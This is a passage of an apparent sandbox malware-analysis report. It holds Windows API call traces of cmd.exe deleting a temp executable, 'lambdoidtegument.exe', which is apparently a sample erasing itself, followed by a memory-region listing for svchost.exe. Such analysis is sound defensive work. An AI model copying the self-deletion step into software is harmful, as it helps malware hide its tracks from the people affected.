RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fc8c, dwLength=0x1c | out: 
lpBuffer=0x26fc8c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0071.308] GetConsoleOutputCP () returned 0x1b5 [0071.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0071.308] SetConsoleCtrlHandler (HandlerRoutine=0x4a2ee72a, Add=1) returned 1 [0071.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0071.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.308] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0071.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.308] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.308] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0071.309] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.309] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0071.309] GetEnvironmentStringsW () returned 0x80130* [0071.309] FreeEnvironmentStringsW (penv=0x80130) returned 1 [0071.309] GetEnvironmentStringsW () returned 0x80130* [0071.309] FreeEnvironmentStringsW (penv=0x80130) returned 1 [0071.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ec2c | out: 
phkResult=0x26ec2c*=0x40) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0xe0, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x0, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegCloseKey (hKey=0x40) returned 0x0 [0071.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ec2c | out: phkResult=0x26ec2c*=0x40) returned 0x0 [0071.310] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x0, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x9, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x9, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x9, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegCloseKey (hKey=0x40) returned 0x0 [0071.310] time (in: timer=0x0 | out: timer=0x0) returned 0x5a3a7355 [0071.310] srand (_Seed=0x5a3a7355) [0071.310] GetCommandLineW () returned="/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0071.310] GetCommandLineW () returned="/c del 
\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0071.312] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.312] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81a28, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0071.313] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0071.313] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0071.313] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.313] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0071.313] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0071.313] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0071.313] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0071.313] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0071.313] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0071.313] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0071.313] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0071.313] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0071.313] GetEnvironmentStringsW () returned 0x824a0* [0071.313] FreeEnvironmentStringsW (penv=0x824a0) returned 1 [0071.313] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.313] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 
[0071.313] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0071.313] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0071.313] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0071.313] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0071.313] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0071.313] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0071.313] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0071.313] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0071.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f9f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26f9f8, lpFilePart=0x26f9f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f9f4*="system32") returned 0x13 [0071.314] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0071.314] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f774 | out: lpFindFileData=0x26f774) returned 0x80998 [0071.314] FindClose (in: hFindFile=0x80998 | out: hFindFile=0x80998) returned 1 [0071.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f774 | out: lpFindFileData=0x26f774) returned 0x80998 [0071.314] FindClose (in: hFindFile=0x80998 | out: hFindFile=0x80998) returned 1 [0071.314] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0071.314] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0071.314] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0071.314] GetEnvironmentStringsW () returned 0x80130* [0071.314] FreeEnvironmentStringsW (penv=0x80130) returned 1 [0071.314] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: 
lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.315] GetConsoleOutputCP () returned 0x1b5 [0071.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0071.315] GetUserDefaultLCID () returned 0x409 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a2f4950, cchData=8 | out: lpLCData=":") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fb38, cchData=128 | out: lpLCData="0") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fb38, cchData=128 | out: lpLCData="0") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fb38, cchData=128 | out: lpLCData="1") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a2f4940, cchData=8 | out: lpLCData="/") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a2f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a2f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a2f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a2f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a2f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a2f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a2f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a2f4930, cchData=8 | out: lpLCData=".") returned 2 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a2f4920, cchData=8 | out: lpLCData=",") returned 2 [0071.316] setlocale (category=0, 
locale=".OCP") returned="English_United States.437" [0071.317] GetConsoleTitleW (in: lpConsoleTitle=0x70888, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.317] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c10000 [0071.317] GetProcAddress (hModule=0x76c10000, lpProcName="CopyFileExW") returned 0x76c4ac6c [0071.317] GetProcAddress (hModule=0x76c10000, lpProcName="IsDebuggerPresent") returned 0x76c53ea8 [0071.317] GetProcAddress (hModule=0x76c10000, lpProcName="SetConsoleInputExeNameW") returned 0x76c62732 [0071.324] _wcsicmp (_String1="del", _String2=")") returned 59 [0071.324] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0071.324] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0071.324] _wcsicmp (_String1="IF", _String2="del") returned 5 [0071.324] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0071.324] _wcsicmp (_String1="REM", _String2="del") returned 14 [0071.324] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0071.326] GetConsoleTitleW (in: lpConsoleTitle=0x26f830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.326] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0071.326] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0071.326] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0071.328] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26f5e8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.328] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26e678 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.328] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e8a8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e8ac, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e8a8*=0xff, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer="NTFS") returned 1 [0071.329] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2=".") returned 62 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2="..") returned 62 [0071.329] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x2020 [0071.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81ea0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.329] SetErrorMode (uMode=0x0) returned 0x1 [0071.329] SetErrorMode (uMode=0x1) returned 0x0 [0071.329] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x104, lpBuffer=0x26eccc, lpFilePart=0x26ecb4 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x26ecb4*="lambdoidtegument.exe") returned 0x39 [0071.329] SetErrorMode (uMode=0x1) returned 0x1 [0071.329] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp")) returned 0x2010 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2=".") returned 62 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2="..") returned 62 [0071.329] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x2020 [0071.329] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", fInfoLevelId=0x0, lpFindFileData=0x8013c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8013c) returned 0x82410 [0071.330] DeleteFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: 
"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 1 [0071.332] FindNextFileW (in: hFindFile=0x82410, lpFindFileData=0x8013c | out: lpFindFileData=0x8013c) returned 0 [0071.333] GetLastError () returned 0x12 [0071.333] FindClose (in: hFindFile=0x82410 | out: hFindFile=0x82410) returned 1 [0071.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.333] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0071.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.333] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0071.334] SetConsoleInputExeNameW () returned 0x1 [0071.334] GetConsoleOutputCP () returned 0x1b5 [0071.334] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0071.334] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.334] exit (_Code=0) Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1e6160" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x610" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a152" [0xc000000f], "LOCAL" [0x7] Region: id = 1545 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1546 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1547 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1548 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1549 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1550 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1551 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1552 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1553 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1554 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1555 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1556 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1557 start_va = 0x290000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1558 start_va = 0x2b0000 end_va = 0x3affff 
entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1559 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1560 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1561 start_va = 0x500000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1562 start_va = 0x520000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1563 start_va = 0x540000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1564 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1565 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1566 start_va = 0x5e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1567 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1568 start_va = 0x600000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1569 start_va = 0x640000 end_va = 0x680fff entry_point = 0x640000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1570 start_va = 0x690000 end_va = 0x690fff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1571 start_va = 0x6a0000 end_va = 
0x6a0fff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1572 start_va = 0x6b0000 end_va = 0x6b7fff entry_point = 0x6b0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1573 start_va = 0x6c0000 end_va = 0xab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1574 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 1575 start_va = 0xad0000 end_va = 0xb17fff entry_point = 0xad0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1576 start_va = 0xb20000 end_va = 0xb21fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1577 start_va = 0xb30000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 1578 start_va = 0xb70000 end_va = 0xe3efff entry_point = 0xb70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1579 start_va = 0xe40000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1580 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1581 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1582 start_va = 0xfc0000 end_va = 0xfc7fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" 
Region: id = 1583 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 1584 start_va = 0xfe0000 end_va = 0xfe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 1585 start_va = 0xff0000 end_va = 0xff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 1586 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1587 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1588 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1589 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1590 start_va = 0x1190000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1591 start_va = 0x11d0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1592 start_va = 0x12d0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 1593 start_va = 0x13d0000 end_va = 0x1417fff entry_point = 0x13d0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1594 start_va = 0x1460000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1595 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = 
"private_0x00000000014b0000" filename = "" Region: id = 1596 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 1597 start_va = 0x1550000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1598 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 1599 start_va = 0x15e0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 1600 start_va = 0x1650000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 1601 start_va = 0x1690000 end_va = 0x188ffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 1602 start_va = 0x1890000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 1603 start_va = 0x1c90000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1604 start_va = 0x1d20000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1605 start_va = 0x1d80000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" 